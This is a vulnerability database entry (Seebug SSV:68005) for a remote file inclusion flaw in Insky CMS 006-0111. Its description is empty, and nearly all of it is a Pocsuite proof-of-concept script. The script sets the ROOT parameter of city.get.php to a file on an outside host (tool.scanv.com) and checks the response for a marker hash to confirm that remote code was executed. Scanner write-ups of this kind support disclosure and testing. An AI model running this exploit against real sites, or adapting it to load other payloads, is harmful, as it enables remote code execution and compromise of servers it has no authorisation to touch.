Insky CMS 006-0111 - Multiple Remote File Include Vulnerability

2014-07-01T00:00:00
ID SSV:68005
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

import re
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class Insky_CMS_Remote_File_Include(POCBase):
    vulID = '68005'
    version = '1'
    vulDate = '2006-06-25'
    author = ' '
    createDate = '2015-12-20'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-68005']
    name = 'Insky CMS 006-0111 - Multiple Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'Insky CMS'
    appVersion = '006-0111'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/modules/city.get/city.get.php?ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        response = req.get(vul_url).content

        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(Insky_CMS_Remote_File_Include)